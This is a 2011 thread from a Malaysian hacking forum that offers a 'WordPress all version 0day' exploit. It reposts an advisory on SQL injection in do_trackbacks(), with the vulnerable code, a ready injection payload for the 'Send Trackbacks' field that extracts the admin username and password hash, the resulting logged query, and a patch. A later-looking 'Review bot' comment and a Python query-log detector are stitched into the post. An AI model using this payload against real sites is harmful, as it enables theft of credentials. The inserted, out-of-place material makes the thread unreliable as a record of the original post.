Malaysian WackWall Forum
 WordPress all version 0day exploit

wackwall
Admin

Post subject: WordPress all version 0day exploit (Sat Feb 12, 2011 9:14 pm)


Description: SQL injection vulnerability in the do_trackbacks() function
of WordPress allows remote attackers to execute an arbitrary SELECT SQL
query.

Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this article.
The do_trackbacks() function in wp-includes/comment.php does not
properly escape the input that comes from the user, allowing a remote
user with publish_posts and edit_published_posts capabilities to execute
an arbitrary SELECT SQL query, which can lead to disclosure of any
information stored in the WordPress database.
Code:
function do_trackbacks($post_id) {
    global $wpdb;

    $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );
    $to_ping = get_to_ping($post_id);
    $pinged  = get_pung($post_id);
    if ( empty($to_ping) ) {
        $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );
        return;
    }

    if ( empty($post->post_excerpt) )
        $excerpt = apply_filters('the_content', $post->post_content);
    else
        $excerpt = apply_filters('the_excerpt', $post->post_excerpt);
    $excerpt = str_replace(']]>', ']]&gt;', $excerpt); // the HTML entity was decoded by the forum renderer
    $excerpt = wp_html_excerpt($excerpt, 252) . '...';

    $post_title = apply_filters('the_title', $post->post_title);
    $post_title = strip_tags($post_title);

    if ( $to_ping ) {
        foreach ( (array) $to_ping as $tb_ping ) {
            $tb_ping = trim($tb_ping);
            if ( !in_array($tb_ping, $pinged) ) {
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
                $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
            }
        }
    }
}
The $tb_ping variable is passed to the query in line 1657 unescaped.
Exploitation. The logged in user must have publish_posts and
edit_published_posts capabilities (this corresponds to the Author role).
Below is an example of how this vulnerability can be exploited (images
below are clickable):

First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
and publishes it. He needs to wait a bit — for wp-cron.php to process
the trackback. The get_to_ping() function says that this trackback is
to be processed:
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
Then the user goes back and edits the post:

Now the user duplicates the text in the “Send Trackbacks” field and updates the post
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
The get_to_ping() function says that these trackbacks are to be processed:
Code:
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
Query logging shows that WordPress executes this query (reformatted for the sake of readability):
UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))
WHERE ID = 11

After that when the user refreshes the page (he may need to wait a
bit for wp-cron.php to complete), he will see something like this:

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability:
Code:
Index: wp-includes/comment.php
===================================================================
--- wp-includes/comment.php (revision 16609)
+++ wp-includes/comment.php (working copy)
@@ -1723,7 +1723,7 @@
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
-              $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
+              $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) );
            }
        }
    }
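Review bot: Binding $tb_ping through the %s placeholder of $wpdb->prepare(), as the added line does, is the right fix for the removed line's `'$tb_ping'` interpolation: prepare() escapes the bound value and supplies the surrounding quotes itself, so the value can no longer terminate the string literal and append further SET assignments the way the logged query above shows. The one interpolation left in the statement, $wpdb->posts, is the table name WordPress derives from its own prefix rather than user input, so it does not need a placeholder. Worth carrying over as a review rule for the rest of comment.php: any other `'$var'` written directly inside a prepare() format string has exactly this defect, since prepare() only protects values passed as arguments.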
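The logged UPDATE statement above has a fixed, recognizable shape when do_trackbacks() behaves as intended: one quoted URL literal inside TRIM(REPLACE(...)) followed directly by the WHERE clause. The following check, added here as a defender's example and not part of the original post or of WordPress, flags any to_ping cleanup statement in a MySQL query log that departs from that shape; the sample log is constructed, with the second entry taken verbatim from the advisory's query log output.

```python
import re
from typing import List, Optional, Tuple

# Expected shape of the to_ping cleanup statement that do_trackbacks() in
# wp-includes/comment.php issues for an already-pinged URL:
#   UPDATE wp_posts SET to_ping = TRIM(REPLACE(to_ping, '<url>', '')) WHERE ID = <n>
# With $tb_ping bound via %s, $wpdb->prepare() emits it as a single
# backslash-escaped literal, so a cleanup statement carrying extra SET
# assignments or a subquery can only come from the unescaped interpolation.
CLEANUP_PREFIX = re.compile(
    r"^UPDATE\s+\w+\s+SET\s+to_ping\s*=\s*TRIM\(REPLACE\(to_ping,", re.IGNORECASE
)
WELL_FORMED = re.compile(
    r"^UPDATE\s+\w+\s+SET\s+to_ping\s*=\s*TRIM\(REPLACE\(to_ping,\s*"
    r"'(?:[^'\\]|\\.)*',\s*''\)\)\s+WHERE\s+ID\s*=\s*\d+\s*;?$",
    re.IGNORECASE,
)


def normalize(statement: str) -> str:
    """Collapse the line breaks and indentation a query log or a reformatted dump adds."""
    return " ".join(statement.split())


def classify(statement: str) -> Optional[str]:
    """None for unrelated statements, 'ok' for a well-formed cleanup query,
    'suspicious' when the cleanup prefix is present but the statement is not
    exactly one quoted URL literal followed by the WHERE clause."""
    q = normalize(statement)
    if not CLEANUP_PREFIX.match(q):
        return None
    return "ok" if WELL_FORMED.match(q) else "suspicious"


def scan_log(statements: List[str]) -> List[Tuple[int, str]]:
    """Return (index, normalized statement) for every flagged cleanup query."""
    return [(i, normalize(s)) for i, s in enumerate(statements) if classify(s) == "suspicious"]


# Constructed sample log: a benign cleanup, the statement logged in the
# advisory above, and an unrelated query the check must ignore.
SAMPLE_LOG = [
    "UPDATE wp_posts SET to_ping = TRIM(REPLACE(to_ping, 'http://example.com/post/1', '')) WHERE ID = 11",
    "UPDATE wp_posts\nSET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)"
    "/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))\nWHERE ID = 11",
    "SELECT * FROM wp_posts WHERE ID = 11",
]

if __name__ == "__main__":
    for idx, stmt in scan_log(SAMPLE_LOG):
        print(f"statement {idx} breaks the expected cleanup shape: {stmt[:80]}...")
```

After the patch is applied the same payload arrives as one escaped literal and classifies as "ok", which is the correct outcome: the check detects the injection, not the presence of odd characters in a trackback URL.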
masokis
New User

Post subject: Re: WordPress all version 0day exploit (Mon Mar 07, 2011 9:43 pm)

If you have already managed to log in as admin/author, why would you still need an exploit like this?
If you don't have admin/author access, you can't use it, right?
wackwall
Admin

Post subject: Re: WordPress all version 0day exploit (Tue Mar 08, 2011 7:49 am)

no access no gain...